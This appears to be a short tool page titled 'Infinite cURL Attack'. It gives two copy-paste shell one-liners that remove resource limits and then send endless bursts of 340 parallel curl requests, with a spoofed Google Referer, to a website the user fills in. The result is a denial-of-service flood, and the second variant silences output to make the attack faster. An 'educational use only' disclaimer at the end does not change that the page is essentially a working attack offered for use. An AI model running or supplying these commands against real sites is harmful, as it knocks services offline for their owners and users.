Infinite cURL Attack
USAGE : Copy-Paste-Edit the following code (replace https://Your.Target.Website.com with your target website) in the Terminal/CMD & press Enter.
ulimit -t unlimited; ulimit -f unlimited; ulimit -m unlimited; ulimit -u unlimited; ulimit -n 10000000000; ulimit -s unlimited; ulimit -v unlimited; while (true); do seq 1 340 | xargs -n1 -P 340 curl -I -i -v -H "Connection: keep-alive" -H "Referer: https://google.com" "https://Your.Target.Website.com"; done;
If you don't want logs in your terminal and make the attacks faster, do this (the following is my preference):
ulimit -t unlimited; ulimit -f unlimited; ulimit -m unlimited; ulimit -u unlimited; ulimit -n 10000000000; ulimit -s unlimited; ulimit -v unlimited; while (true); do seq 1 340 | xargs -n1 -P 340 curl -s -H "Connection: keep-alive" -H "Referer: https://google.com" "https://Your.Target.Website.com" > /dev/null; done;
IMPORTANT:
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY!
IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT.
BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.